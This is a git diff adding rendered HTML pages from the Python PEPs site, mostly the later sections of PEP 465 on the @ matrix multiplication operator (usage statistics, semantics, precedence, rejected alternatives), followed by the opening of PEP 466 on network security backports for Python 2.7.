For these kinds of users, whose programming knowledge is fragile, the +existence of a transparent mapping between formulas and code often +means the difference between succeeding and failing to write that code +at all. This is so important that such classes often use the +numpy.matrix type which defines * to mean matrix +multiplication, even though this type is buggy and heavily +disrecommended by the rest of the numpy community for the +fragmentation that it causes. This pedagogical use case is, in fact, +the only reason numpy.matrix remains a supported part of numpy. +Adding @ will benefit both beginning and advanced users with +better syntax; and furthermore, it will allow both groups to +standardize on the same notation from the start, providing a smoother +on-ramp to expertise.

+
+
+

But isn’t matrix multiplication a pretty niche requirement?

+

The world is full of continuous data, and computers are increasingly +called upon to work with it in sophisticated ways. Arrays are the +lingua franca of finance, machine learning, 3d graphics, computer +vision, robotics, operations research, econometrics, meteorology, +computational linguistics, recommendation systems, neuroscience, +astronomy, bioinformatics (including genetics, cancer research, drug +discovery, etc.), physics engines, quantum mechanics, geophysics, +network analysis, and many other application areas. In most or all of +these areas, Python is rapidly becoming a dominant player, in large +part because of its ability to elegantly mix traditional discrete data +structures (hash tables, strings, etc.) on an equal footing with +modern numerical data types and algorithms.

+

We all live in our own little sub-communities, so some Python users +may be surprised to realize the sheer extent to which Python is used +for number crunching – especially since much of this particular +sub-community’s activity occurs outside of traditional Python/FOSS +channels. So, to give some rough idea of just how many numerical +Python programmers are actually out there, here are two numbers: In +2013, there were 7 international conferences organized specifically on +numerical Python [3] [4]. At PyCon 2014, ~20% +of the tutorials appear to involve the use of matrices +[6].

+

To quantify this further, we used Github’s “search” function to look +at what modules are actually imported across a wide range of +real-world code (i.e., all the code on Github). We checked for +imports of several popular stdlib modules, a variety of numerically +oriented modules, and various other extremely high-profile modules +like django and lxml (the latter of which is the #1 most downloaded +package on PyPI). Starred lines indicate packages which export +array- or matrix-like objects which will adopt @ if this PEP is +approved:

+
Count of Python source files on Github matching given search terms
+                 (as of 2014-04-10, ~21:00 UTC)
+================ ==========  ===============  =======  ===========
+module           "import X"  "from X import"    total  total/numpy
+================ ==========  ===============  =======  ===========
+sys                 2374638            63301  2437939         5.85
+os                  1971515            37571  2009086         4.82
+re                  1294651             8358  1303009         3.12
+numpy ************** 337916 ********** 79065 * 416981 ******* 1.00
+warnings             298195            73150   371345         0.89
+subprocess           281290            63644   344934         0.83
+django                62795           219302   282097         0.68
+math                 200084            81903   281987         0.68
+threading            212302            45423   257725         0.62
+pickle+cPickle       215349            22672   238021         0.57
+matplotlib           119054            27859   146913         0.35
+sqlalchemy            29842            82850   112692         0.27
+pylab *************** 36754 ********** 41063 ** 77817 ******* 0.19
+scipy *************** 40829 ********** 28263 ** 69092 ******* 0.17
+lxml                  19026            38061    57087         0.14
+zlib                  40486             6623    47109         0.11
+multiprocessing       25247            19850    45097         0.11
+requests              30896              560    31456         0.08
+jinja2                 8057            24047    32104         0.08
+twisted               13858             6404    20262         0.05
+gevent                11309             8529    19838         0.05
+pandas ************** 14923 *********** 4005 ** 18928 ******* 0.05
+sympy                  2779             9537    12316         0.03
+theano *************** 3654 *********** 1828 *** 5482 ******* 0.01
+================ ==========  ===============  =======  ===========
+
+
+

These numbers should be taken with several grains of salt (see +footnote for discussion: [12]), but, to the extent they +can be trusted, they suggest that numpy might be the single +most-imported non-stdlib module in the entire Pythonverse; it’s even +more-imported than such stdlib stalwarts as subprocess, math, +pickle, and threading. And numpy users represent only a +subset of the broader numerical community that will benefit from the +@ operator. Matrices may once have been a niche data type +restricted to Fortran programs running in university labs and military +clusters, but those days are long gone. Number crunching is a +mainstream part of modern Python usage.

+

In addition, there is some precedence for adding an infix operator to +handle a more-specialized arithmetic operation: the floor division +operator //, like the bitwise operators, is very useful under +certain circumstances when performing exact calculations on discrete +values. But it seems likely that there are many Python programmers +who have never had reason to use // (or, for that matter, the +bitwise operators). @ is no more niche than //.

+
+
+

So @ is good for matrix formulas, but how common are those really?

+

We’ve seen that @ makes matrix formulas dramatically easier to +work with for both experts and non-experts, that matrix formulas +appear in many important applications, and that numerical libraries +like numpy are used by a substantial proportion of Python’s user base. +But numerical libraries aren’t just about matrix formulas, and being +important doesn’t necessarily mean taking up a lot of code: if matrix +formulas only occurred in one or two places in the average +numerically-oriented project, then it still wouldn’t be worth adding a +new operator. So how common is matrix multiplication, really?

+

When the going gets tough, the tough get empirical. To get a rough +estimate of how useful the @ operator will be, the table below +shows the rate at which different Python operators are actually used +in the stdlib, and also in two high-profile numerical packages – the +scikit-learn machine learning library, and the nipy neuroimaging +library – normalized by source lines of code (SLOC). Rows are sorted +by the ‘combined’ column, which pools all three code bases together. +The combined column is thus strongly weighted towards the stdlib, +which is much larger than both projects put together (stdlib: 411575 +SLOC, scikit-learn: 50924 SLOC, nipy: 37078 SLOC). [7]

+

The dot row (marked ******) counts how common matrix multiply +operations are in each codebase.

+
====  ======  ============  ====  ========
+  op  stdlib  scikit-learn  nipy  combined
+====  ======  ============  ====  ========
+   =    2969          5536  4932      3376 / 10,000 SLOC
+   -     218           444   496       261
+   +     224           201   348       231
+  ==     177           248   334       196
+   *     156           284   465       192
+   %     121           114   107       119
+  **      59           111   118        68
+  !=      40            56    74        44
+   /      18           121   183        41
+   >      29            70   110        39
+  +=      34            61    67        39
+   <      32            62    76        38
+  >=      19            17    17        18
+  <=      18            27    12        18
+ dot ***** 0 ********** 99 ** 74 ****** 16
+   |      18             1     2        15
+   &      14             0     6        12
+  <<      10             1     1         8
+  //       9             9     1         8
+  -=       5            21    14         8
+  *=       2            19    22         5
+  /=       0            23    16         4
+  >>       4             0     0         3
+   ^       3             0     0         3
+   ~       2             4     5         2
+  |=       3             0     0         2
+  &=       1             0     0         1
+ //=       1             0     0         1
+  ^=       1             0     0         0
+ **=       0             2     0         0
+  %=       0             0     0         0
+ <<=       0             0     0         0
+ >>=       0             0     0         0
+====  ======  ============  ====  ========
+
+
+

These two numerical packages alone contain ~780 uses of matrix +multiplication. Within these packages, matrix multiplication is used +more heavily than most comparison operators (< != <= +>=). Even when we dilute these counts by including the stdlib +into our comparisons, matrix multiplication is still used more often +in total than any of the bitwise operators, and 2x as often as //. +This is true even though the stdlib, which contains a fair amount of +integer arithmetic and no matrix operations, makes up more than 80% of +the combined code base.

+

By coincidence, the numeric libraries make up approximately the same +proportion of the ‘combined’ codebase as numeric tutorials make up of +PyCon 2014’s tutorial schedule, which suggests that the ‘combined’ +column may not be wildly unrepresentative of new Python code in +general. While it’s impossible to know for certain, from this data it +seems entirely possible that across all Python code currently being +written, matrix multiplication is already used more often than // +and the bitwise operations.

+
+
+

But isn’t it weird to add an operator with no stdlib uses?

+

It’s certainly unusual (though extended slicing existed for some time +builtin types gained support for it, Ellipsis is still unused +within the stdlib, etc.). But the important thing is whether a change +will benefit users, not where the software is being downloaded from. +It’s clear from the above that @ will be used, and used heavily. +And this PEP provides the critical piece that will allow the Python +numerical community to finally reach consensus on a standard duck type +for all array-like objects, which is a necessary precondition to ever +adding a numerical array type to the stdlib.

+
+
+
+

Compatibility considerations

+

Currently, the only legal use of the @ token in Python code is at +statement beginning in decorators. The new operators are both infix; +the one place they can never occur is at statement beginning. +Therefore, no existing code will be broken by the addition of these +operators, and there is no possible parsing ambiguity between +decorator-@ and the new operators.

+

Another important kind of compatibility is the mental cost paid by +users to update their understanding of the Python language after this +change, particularly for users who do not work with matrices and thus +do not benefit. Here again, @ has minimal impact: even +comprehensive tutorials and references will only need to add a +sentence or two to fully document this PEP’s changes for a +non-numerical audience.

+
+
+

Intended usage details

+

This section is informative, rather than normative – it documents the +consensus of a number of libraries that provide array- or matrix-like +objects on how @ will be implemented.

+

This section uses the numpy terminology for describing arbitrary +multidimensional arrays of data, because it is a superset of all other +commonly used models. In this model, the shape of any array is +represented by a tuple of integers. Because matrices are +two-dimensional, they have len(shape) == 2, while 1d vectors have +len(shape) == 1, and scalars have shape == (), i.e., they are “0 +dimensional”. Any array contains prod(shape) total entries. Notice +that prod(()) == 1 (for the same reason that sum(()) == 0); scalars +are just an ordinary kind of array, not a special case. Notice also +that we distinguish between a single scalar value (shape == (), +analogous to 1), a vector containing only a single entry (shape == +(1,), analogous to [1]), a matrix containing only a single entry +(shape == (1, 1), analogous to [[1]]), etc., so the dimensionality +of any array is always well-defined. Other libraries with more +restricted representations (e.g., those that support 2d arrays only) +might implement only a subset of the functionality described here.

+
+

Semantics

+

The recommended semantics for @ for different inputs are:

+
    +
  • 2d inputs are conventional matrices, and so the semantics are +obvious: we apply conventional matrix multiplication. If we write +arr(2, 3) to represent an arbitrary 2x3 array, then arr(2, 3) +@ arr(3, 4) returns an array with shape (2, 4).
  • +
  • 1d vector inputs are promoted to 2d by prepending or appending a ‘1’ +to the shape, the operation is performed, and then the added +dimension is removed from the output. The 1 is always added on the +“outside” of the shape: prepended for left arguments, and appended +for right arguments. The result is that matrix @ vector and vector +@ matrix are both legal (assuming compatible shapes), and both +return 1d vectors; vector @ vector returns a scalar. This is +clearer with examples.
      +
    • arr(2, 3) @ arr(3, 1) is a regular matrix product, and returns +an array with shape (2, 1), i.e., a column vector.
    • +
    • arr(2, 3) @ arr(3) performs the same computation as the +previous (i.e., treats the 1d vector as a matrix containing a +single column, shape = (3, 1)), but returns the result with +shape (2,), i.e., a 1d vector.
    • +
    • arr(1, 3) @ arr(3, 2) is a regular matrix product, and returns +an array with shape (1, 2), i.e., a row vector.
    • +
    • arr(3) @ arr(3, 2) performs the same computation as the +previous (i.e., treats the 1d vector as a matrix containing a +single row, shape = (1, 3)), but returns the result with shape +(2,), i.e., a 1d vector.
    • +
    • arr(1, 3) @ arr(3, 1) is a regular matrix product, and returns +an array with shape (1, 1), i.e., a single value in matrix form.
    • +
    • arr(3) @ arr(3) performs the same computation as the +previous, but returns the result with shape (), i.e., a single +scalar value, not in matrix form. So this is the standard inner +product on vectors.
    • +
    +

    An infelicity of this definition for 1d vectors is that it makes +@ non-associative in some cases ((Mat1 @ vec) @ Mat2 != +Mat1 @ (vec @ Mat2)). But this seems to be a case where +practicality beats purity: non-associativity only arises for strange +expressions that would never be written in practice; if they are +written anyway then there is a consistent rule for understanding +what will happen (Mat1 @ vec @ Mat2 is parsed as (Mat1 @ vec) +@ Mat2, just like a - b - c); and, not supporting 1d vectors +would rule out many important use cases that do arise very commonly +in practice. No-one wants to explain to new users why to solve the +simplest linear system in the obvious way, they have to type +(inv(A) @ b[:, np.newaxis]).flatten() instead of inv(A) @ b, +or perform an ordinary least-squares regression by typing +solve(X.T @ X, X @ y[:, np.newaxis]).flatten() instead of +solve(X.T @ X, X @ y). No-one wants to type (a[np.newaxis, :] +@ b[:, np.newaxis])[0, 0] instead of a @ b every time they +compute an inner product, or (a[np.newaxis, :] @ Mat @ b[:, +np.newaxis])[0, 0] for general quadratic forms instead of a @ +Mat @ b. In addition, sage and sympy (see below) use these +non-associative semantics with an infix matrix multiplication +operator (they use *), and they report that they haven’t +experienced any problems caused by it.

    +
  • +
  • For inputs with more than 2 dimensions, we treat the last two +dimensions as being the dimensions of the matrices to multiply, and +‘broadcast’ across the other dimensions. This provides a convenient +way to quickly compute many matrix products in a single operation. +For example, arr(10, 2, 3) @ arr(10, 3, 4) performs 10 separate +matrix multiplies, each of which multiplies a 2x3 and a 3x4 matrix +to produce a 2x4 matrix, and then returns the 10 resulting matrices +together in an array with shape (10, 2, 4). The intuition here is +that we treat these 3d arrays of numbers as if they were 1d arrays +of matrices, and then apply matrix multiplication in an +elementwise manner, where now each ‘element’ is a whole matrix. +Note that broadcasting is not limited to perfectly aligned arrays; +in more complicated cases, it allows several simple but powerful +tricks for controlling how arrays are aligned with each other; see +[10] for details. (In particular, it turns out that +when broadcasting is taken into account, the standard scalar * +matrix product is a special case of the elementwise multiplication +operator *.)

    If one operand is >2d, and another operand is 1d, then the above +rules apply unchanged, with 1d->2d promotion performed before +broadcasting. E.g., arr(10, 2, 3) @ arr(3) first promotes to +arr(10, 2, 3) @ arr(3, 1), then broadcasts the right argument to +create the aligned operation arr(10, 2, 3) @ arr(10, 3, 1), +multiplies to get an array with shape (10, 2, 1), and finally +removes the added dimension, returning an array with shape (10, 2). +Similarly, arr(2) @ arr(10, 2, 3) produces an intermediate array +with shape (10, 1, 3), and a final array with shape (10, 3).

    +
  • +
  • 0d (scalar) inputs raise an error. Scalar * matrix multiplication +is a mathematically and algorithmically distinct operation from +matrix @ matrix multiplication, and is already covered by the +elementwise * operator. Allowing scalar @ matrix would thus +both require an unnecessary special case, and violate TOOWTDI.
  • +
+
+
+

Adoption

+

We group existing Python projects which provide array- or matrix-like +types based on what API they currently use for elementwise and matrix +multiplication.

+

Projects which currently use * for elementwise multiplication, and +function/method calls for matrix multiplication:

+

The developers of the following projects have expressed an intention +to implement @ on their array-like types using the above +semantics:

+
    +
  • numpy
  • +
  • pandas
  • +
  • blaze
  • +
  • theano
  • +
+

The following projects have been alerted to the existence of the PEP, +but it’s not yet known what they plan to do if it’s accepted. We +don’t anticipate that they’ll have any objections, though, since +everything proposed here is consistent with how they already do +things:

+
    +
  • pycuda
  • +
  • panda3d
  • +
+

Projects which currently use * for matrix multiplication, and +function/method calls for elementwise multiplication:

+

The following projects have expressed an intention, if this PEP is +accepted, to migrate from their current API to the elementwise-*, +matmul-@ convention (i.e., this is a list of projects whose API +fragmentation will probably be eliminated if this PEP is accepted):

+
    +
  • numpy (numpy.matrix)
  • +
  • scipy.sparse
  • +
  • pyoperators
  • +
  • pyviennacl
  • +
+

The following projects have been alerted to the existence of the PEP, +but it’s not known what they plan to do if it’s accepted (i.e., this +is a list of projects whose API fragmentation may or may not be +eliminated if this PEP is accepted):

+
    +
  • cvxopt
  • +
+

Projects which currently use * for matrix multiplication, and which +don’t really care about elementwise multiplication of matrices:

+

There are several projects which implement matrix types, but from a +very different perspective than the numerical libraries discussed +above. These projects focus on computational methods for analyzing +matrices in the sense of abstract mathematical objects (i.e., linear +maps over free modules over rings), rather than as big bags full of +numbers that need crunching. And it turns out that from the abstract +math point of view, there isn’t much use for elementwise operations in +the first place; as discussed in the Background section above, +elementwise operations are motivated by the bag-of-numbers approach. +So these projects don’t encounter the basic problem that this PEP +exists to address, making it mostly irrelevant to them; while they +appear superficially similar to projects like numpy, they’re actually +doing something quite different. They use * for matrix +multiplication (and for group actions, and so forth), and if this PEP +is accepted, their expressed intention is to continue doing so, while +perhaps adding @ as an alias. These projects include:

+
    +
  • sympy
  • +
  • sage
  • +
+
+
+
+

Implementation details

+

New functions operator.matmul and operator.__matmul__ are +added to the standard library, with the usual semantics.

+

A corresponding function PyObject* PyObject_MatrixMultiply(PyObject +*o1, PyObject *o2) is added to the C API.

+

A new AST node is added named MatMult, along with a new token +ATEQUAL and new bytecode opcodes BINARY_MATRIX_MULTIPLY and +INPLACE_MATRIX_MULTIPLY.

+

Two new type slots are added; whether this is to PyNumberMethods +or a new PyMatrixMethods struct remains to be determined.

+
+
+

Rationale for specification details

+
+

Choice of operator

+

Why @ instead of some other spelling? There isn’t any consensus +across other programming languages about how this operator should be +named [11]; here we discuss the various options.

+

Restricting ourselves only to symbols present on US English keyboards, +the punctuation characters that don’t already have a meaning in Python +expression context are: @, backtick, $, !, and ?. Of +these options, @ is clearly the best; ! and ? are already +heavily freighted with inapplicable meanings in the programming +context, backtick has been banned from Python by BDFL pronouncement +(see PEP 3099), and $ is uglier, even more dissimilar to * and +, and has Perl/PHP baggage. $ is probably the +second-best option of these, though.

+

Symbols which are not present on US English keyboards start at a +significant disadvantage (having to spend 5 minutes at the beginning +of every numeric Python tutorial just going over keyboard layouts is +not a hassle anyone really wants). Plus, even if we somehow overcame +the typing problem, it’s not clear there are any that are actually +better than @. Some options that have been suggested include:

+
    +
  • U+00D7 MULTIPLICATION SIGN: A × B
  • +
  • U+22C5 DOT OPERATOR: A B
  • +
  • U+2297 CIRCLED TIMES: A B
  • +
  • U+00B0 DEGREE: A ° B
  • +
+

What we need, though, is an operator that means “matrix +multiplication, as opposed to scalar/elementwise multiplication”. +There is no conventional symbol with this meaning in either +programming or mathematics, where these operations are usually +distinguished by context. (And U+2297 CIRCLED TIMES is actually used +conventionally to mean exactly the wrong things: elementwise +multiplication – the “Hadamard product” – or outer product, rather +than matrix/inner product like our operator). @ at least has the +virtue that it looks like a funny non-commutative operator; a naive +user who knows maths but not programming couldn’t look at A * B +versus A × B, or A * B versus A B, or A * B versus +A ° B and guess which one is the usual multiplication, and which +one is the special case.

+

Finally, there is the option of using multi-character tokens. Some +options:

+
    +
  • Matlab and Julia use a .* operator. Aside from being visually +confusable with *, this would be a terrible choice for us +because in Matlab and Julia, * means matrix multiplication and +.* means elementwise multiplication, so using .* for matrix +multiplication would make us exactly backwards from what Matlab and +Julia users expect.
  • +
  • APL apparently used +.×, which by combining a multi-character +token, confusing attribute-access-like . syntax, and a unicode +character, ranks somewhere below U+2603 SNOWMAN on our candidate +list. If we like the idea of combining addition and multiplication +operators as being evocative of how matrix multiplication actually +works, then something like +* could be used – though this may +be too easy to confuse with *+, which is just multiplication +combined with the unary + operator.
  • +
  • PEP 211 suggested ~*. This has the downside that it sort of +suggests that there is a unary * operator that is being combined +with unary ~, but it could work.
  • +
  • R uses %*% for matrix multiplication. In R this forms part of a +general extensible infix system in which all tokens of the form +%foo% are user-defined binary operators. We could steal the +token without stealing the system.
  • +
  • Some other plausible candidates that have been suggested: >< (= +ascii drawing of the multiplication sign ×); the footnote operator +[*] or |*| (but when used in context, the use of vertical +grouping symbols tends to recreate the nested parentheses visual +clutter that was noted as one of the major downsides of the function +syntax we’re trying to get away from); ^*.
  • +
+

So, it doesn’t matter much, but @ seems as good or better than any +of the alternatives:

+
    +
  • It’s a friendly character that Pythoneers are already used to typing +in decorators, but the decorator usage and the math expression +usage are sufficiently dissimilar that it would be hard to confuse +them in practice.
  • +
  • It’s widely accessible across keyboard layouts (and thanks to its +use in email addresses, this is true even of weird keyboards like +those in phones).
  • +
  • It’s round like * and .
  • +
  • The mATrices mnemonic is cute.
  • +
  • The swirly shape is reminiscent of the simultaneous sweeps over rows +and columns that define matrix multiplication
  • +
  • Its asymmetry is evocative of its non-commutative nature.
  • +
  • Whatever, we have to pick something.
  • +
+
+
+

Precedence and associativity

+

There was a long discussion [15] about +whether @ should be right- or left-associative (or even something +more exotic [18]). Almost all Python operators are +left-associative, so following this convention would be the simplest +approach, but there were two arguments that suggested matrix +multiplication might be worth making right-associative as a special +case:

+

First, matrix multiplication has a tight conceptual association with +function application/composition, so many mathematically sophisticated +users have an intuition that an expression like RSx proceeds +from right-to-left, with first S transforming the vector +x, and then R transforming the result. This isn’t +universally agreed (and not all number-crunchers are steeped in the +pure-math conceptual framework that motivates this intuition +[16]), but at the least this +intuition is more common than for other operations like 2⋅3⋅4 which everyone reads as going from left-to-right.

+

Second, if expressions like Mat @ Mat @ vec appear often in code, +then programs will run faster (and efficiency-minded programmers will +be able to use fewer parentheses) if this is evaluated as Mat @ (Mat +@ vec) then if it is evaluated like (Mat @ Mat) @ vec.

+

However, weighing against these arguments are the following:

+

Regarding the efficiency argument, empirically, we were unable to find +any evidence that Mat @ Mat @ vec type expressions actually +dominate in real-life code. Parsing a number of large projects that +use numpy, we found that when forced by numpy’s current funcall syntax +to choose an order of operations for nested calls to dot, people +actually use left-associative nesting slightly more often than +right-associative nesting [17]. And anyway, +writing parentheses isn’t so bad – if an efficiency-minded programmer +is going to take the trouble to think through the best way to evaluate +some expression, they probably should write down the parentheses +regardless of whether they’re needed, just to make it obvious to the +next reader that they order of operations matter.

+

In addition, it turns out that other languages, including those with +much more of a focus on linear algebra, overwhelmingly make their +matmul operators left-associative. Specifically, the @ equivalent +is left-associative in R, Matlab, Julia, IDL, and Gauss. The only +exceptions we found are Mathematica, in which a @ b @ c would be +parsed non-associatively as dot(a, b, c), and APL, in which all +operators are right-associative. There do not seem to exist any +languages that make @ right-associative and * +left-associative. And these decisions don’t seem to be controversial +– I’ve never seen anyone complaining about this particular aspect of +any of these other languages, and the left-associativity of * +doesn’t seem to bother users of the existing Python libraries that use +* for matrix multiplication. So, at the least we can conclude from +this that making @ left-associative will certainly not cause any +disasters. Making @ right-associative, OTOH, would be exploring +new and uncertain ground.

+

And another advantage of left-associativity is that it is much easier +to learn and remember that @ acts like *, than it is to +remember first that @ is unlike other Python operators by being +right-associative, and then on top of this, also have to remember +whether it is more tightly or more loosely binding than +*. (Right-associativity forces us to choose a precedence, and +intuitions were about equally split on which precedence made more +sense. So this suggests that no matter which choice we made, no-one +would be able to guess or remember it.)

+

On net, therefore, the general consensus of the numerical community is +that while matrix multiplication is something of a special case, it’s +not special enough to break the rules, and @ should parse like +* does.

+
+
+

(Non)-Definitions for built-in types

+

No __matmul__ or __matpow__ are defined for builtin numeric +types (float, int, etc.) or for the numbers.Number +hierarchy, because these types represent scalars, and the consensus +semantics for @ are that it should raise an error on scalars.

+

We do not – for now – define a __matmul__ method on the standard +memoryview or array.array objects, for several reasons. Of +course this could be added if someone wants it, but these types would +require quite a bit of additional work beyond __matmul__ before +they could be used for numeric work – e.g., they have no way to do +addition or scalar multiplication either! – and adding such +functionality is beyond the scope of this PEP. In addition, providing +a quality implementation of matrix multiplication is highly +non-trivial. Naive nested loop implementations are very slow and +shipping such an implementation in CPython would just create a trap +for users. But the alternative – providing a modern, competitive +matrix multiply – would require that CPython link to a BLAS library, +which brings a set of new complications. In particular, several +popular BLAS libraries (including the one that ships by default on +OS X) currently break the use of multiprocessing [8]. +Together, these considerations mean that the cost/benefit of adding +__matmul__ to these types just isn’t there, so for now we’ll +continue to delegate these problems to numpy and friends, and defer a +more systematic solution to a future proposal.

+

There are also non-numeric Python builtins which define __mul__ +(str, list, …). We do not define __matmul__ for these +types either, because why would we even do that.

+
+
+

Non-definition of matrix power

+

Earlier versions of this PEP also proposed a matrix power operator, +@@, analogous to **. But on further consideration, it was +decided that the utility of this was sufficiently unclear that it +would be better to leave it out for now, and only revisit the issue if +– once we have more experience with @ – it turns out that @@ +is truly missed. [14]

+
+
+
+

Rejected alternatives to adding a new operator

+

Over the past few decades, the Python numeric community has explored a +variety of ways to resolve the tension between matrix and elementwise +multiplication operations. PEP 211 and PEP 225, both proposed in 2000 +and last seriously discussed in 2008 [9], were early +attempts to add new operators to solve this problem, but suffered from +serious flaws; in particular, at that time the Python numerical +community had not yet reached consensus on the proper API for array +objects, or on what operators might be needed or useful (e.g., PEP 225 +proposes 6 new operators with unspecified semantics). Experience +since then has now led to consensus that the best solution, for both +numeric Python and core Python, is to add a single infix operator for +matrix multiply (together with the other new operators this implies +like @=).

+

We review some of the rejected alternatives here.

+

Use a second type that defines __mul__ as matrix multiplication: +As discussed above (Background: What’s wrong with the status quo?), +this has been tried this for many years via the numpy.matrix type +(and its predecessors in Numeric and numarray). The result is a +strong consensus among both numpy developers and developers of +downstream packages that numpy.matrix should essentially never be +used, because of the problems caused by having conflicting duck types +for arrays. (Of course one could then argue we should only define +__mul__ to be matrix multiplication, but then we’d have the same +problem with elementwise multiplication.) There have been several +pushes to remove numpy.matrix entirely; the only counter-arguments +have come from educators who find that its problems are outweighed by +the need to provide a simple and clear mapping between mathematical +notation and code for novices (see Transparent syntax is especially +crucial for non-expert programmers). But, of course, starting out +newbies with a dispreferred syntax and then expecting them to +transition later causes its own problems. The two-type solution is +worse than the disease.

+

Add lots of new operators, or add a new generic syntax for defining +infix operators: In addition to being generally un-Pythonic and +repeatedly rejected by BDFL fiat, this would be using a sledgehammer +to smash a fly. The scientific python community has consensus that +adding one operator for matrix multiplication is enough to fix the one +otherwise unfixable pain point. (In retrospect, we all think PEP 225 +was a bad idea too – or at least far more complex than it needed to +be.)

+

Add a new @ (or whatever) operator that has some other meaning in +general Python, and then overload it in numeric code: This was the +approach taken by PEP 211, which proposed defining @ to be the +equivalent of itertools.product. The problem with this is that +when taken on its own terms, it’s pretty clear that +itertools.product doesn’t actually need a dedicated operator. It +hasn’t even been deemed worth of a builtin. (During discussions of +this PEP, a similar suggestion was made to define @ as a general +purpose function composition operator, and this suffers from the same +problem; functools.compose isn’t even useful enough to exist.) +Matrix multiplication has a uniquely strong rationale for inclusion as +an infix operator. There almost certainly don’t exist any other +binary operations that will ever justify adding any other infix +operators to Python.

+

Add a .dot method to array types so as to allow “pseudo-infix” +A.dot(B) syntax: This has been in numpy for some years, and in many +cases it’s better than dot(A, B). But it’s still much less readable +than real infix notation, and in particular still suffers from an +extreme overabundance of parentheses. See Why should matrix +multiplication be infix? above.

+

Use a ‘with’ block to toggle the meaning of * within a single code +block: E.g., numpy could define a special context object so that +we’d have:

+
c = a * b   # element-wise multiplication
+with numpy.mul_as_dot:
+    c = a * b  # matrix multiplication
+
+
+

However, this has two serious problems: first, it requires that every +array-like type’s __mul__ method know how to check some global +state (numpy.mul_is_currently_dot or whatever). This is fine if +a and b are numpy objects, but the world contains many +non-numpy array-like objects. So this either requires non-local +coupling – every numpy competitor library has to import numpy and +then check numpy.mul_is_currently_dot on every operation – or +else it breaks duck-typing, with the above code doing radically +different things depending on whether a and b are numpy +objects or some other sort of object. Second, and worse, with +blocks are dynamically scoped, not lexically scoped; i.e., any +function that gets called inside the with block will suddenly find +itself executing inside the mul_as_dot world, and crash and burn +horribly – if you’re lucky. So this is a construct that could only +be used safely in rather limited cases (no function calls), and which +would make it very easy to shoot yourself in the foot without warning.

+

Use a language preprocessor that adds extra numerically-oriented +operators and perhaps other syntax: (As per recent BDFL suggestion: +[1]) This suggestion seems based on the idea that +numerical code needs a wide variety of syntax additions. In fact, +given @, most numerical users don’t need any other operators or +syntax; it solves the one really painful problem that cannot be solved +by other means, and that causes painful reverberations through the +larger ecosystem. Defining a new language (presumably with its own +parser which would have to be kept in sync with Python’s, etc.), just +to support a single binary operator, is neither practical nor +desirable. In the numerical context, Python’s competition is +special-purpose numerical languages (Matlab, R, IDL, etc.). Compared +to these, Python’s killer feature is exactly that one can mix +specialized numerical code with code for XML parsing, web page +generation, database access, network programming, GUI libraries, and +so forth, and we also gain major benefits from the huge variety of +tutorials, reference material, introductory classes, etc., which use +Python. Fragmenting “numerical Python” from “real Python” would be a +major source of confusion. A major motivation for this PEP is to +reduce fragmentation. Having to set up a preprocessor would be an +especially prohibitive complication for unsophisticated users. And we +use Python because we like Python! We don’t want +almost-but-not-quite-Python.

+

Use overloading hacks to define a “new infix operator” like *dot*, +as in a well-known Python recipe: (See: [2]) Beautiful is +better than ugly. This is… not beautiful. And not Pythonic. And +especially unfriendly to beginners, who are just trying to wrap their +heads around the idea that there’s a coherent underlying system behind +these magic incantations that they’re learning, when along comes an +evil hack like this that violates that system, creates bizarre error +messages when accidentally misused, and whose underlying mechanisms +can’t be understood without deep knowledge of how object oriented +systems work.

+

Use a special “facade” type to support syntax like arr.M * arr: +This is very similar to the previous proposal, in that the .M +attribute would basically return the same object as arr *dot would, +and thus suffers the same objections about ‘magicalness’. This +approach also has some non-obvious complexities: for example, while +arr.M * arr must return an array, arr.M * arr.M and +arr * arr.M must return facade objects, or else arr.M * arr.M * arr +and arr * arr.M * arr will not work. But this means that facade +objects must be able to recognize both other array objects and other +facade objects (which creates additional complexity for writing +interoperating array types from different libraries who must now +recognize both each other’s array types and their facade types). It +also creates pitfalls for users who may easily type arr * arr.M or +arr.M * arr.M and expect to get back an array object; instead, +they will get a mysterious object that throws errors when they attempt +to use it. Basically with this approach users must be careful to +think of .M* as an indivisible unit that acts as an infix operator +– and as infix-operator-like token strings go, at least *dot* +is prettier looking (look at its cute little ears!).

+
+
+

Discussions of this PEP

+

Collected here for reference:

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0465.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0466/index.html b/pep-0466/index.html new file mode 100644 index 00000000000..e0ed4510e43 --- /dev/null +++ b/pep-0466/index.html @@ -0,0 +1,743 @@ + + + + + + + + PEP 466 – Network Security Enhancements for Python 2.7.x | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 466 – Network Security Enhancements for Python 2.7.x

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
23-Mar-2014
+
Python-Version:
+
2.7.9
+
Post-History:
+
23-Mar-2014, 24-Mar-2014, 25-Mar-2014, 26-Mar-2014, 16-Apr-2014
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Most CPython tracker issues are classified as errors in behaviour or +proposed enhancements. Most patches to fix behavioural errors are +applied to all active maintenance branches. Enhancement patches are +restricted to the default branch that becomes the next Python version.

+

This cadence works reasonably well during Python’s normal 18-24 month +feature release cycle, which is still applicable to the Python 3 series. +However, the age of the standard library in Python 2 has now reached a point +where it is sufficiently far behind the state of the art in network security +protocols for it to be causing real problems in use cases where upgrading to +Python 3 in the near term may not be feasible.

+

In recognition of the additional practical considerations that have arisen +during the 4+ year maintenance cycle for Python 2.7, this PEP allows a +critical set of network security related features to be backported from +Python 3.4 to upcoming Python 2.7.x maintenance releases.

+

While this PEP does not make any changes to the core development team’s +handling of security-fix-only branches that are no longer in active +maintenance, it does recommend that commercial redistributors providing +extended support periods for the Python standard library either backport +these features to their supported versions, or else explicitly disclaim +support for the use of older versions in roles that involve connecting +directly to the public internet.

+
+ +
+

Implementation status

+

This PEP originally proposed adding all listed features to the Python 2.7.7 +maintenance release. That approach proved to be too ambitious given the +limited time frame between the original creation and acceptance of the PEP +and the release of Python 2.7.7rc1. Instead, the progress of each individual +accepted feature backport is being tracked as an independent enhancement +targeting Python 2.7.

+

Implemented for Python 2.7.7:

+ +

Implemented for Python 2.7.8:

+ +

Implemented for Python 2.7.9 (in development):

+
    +
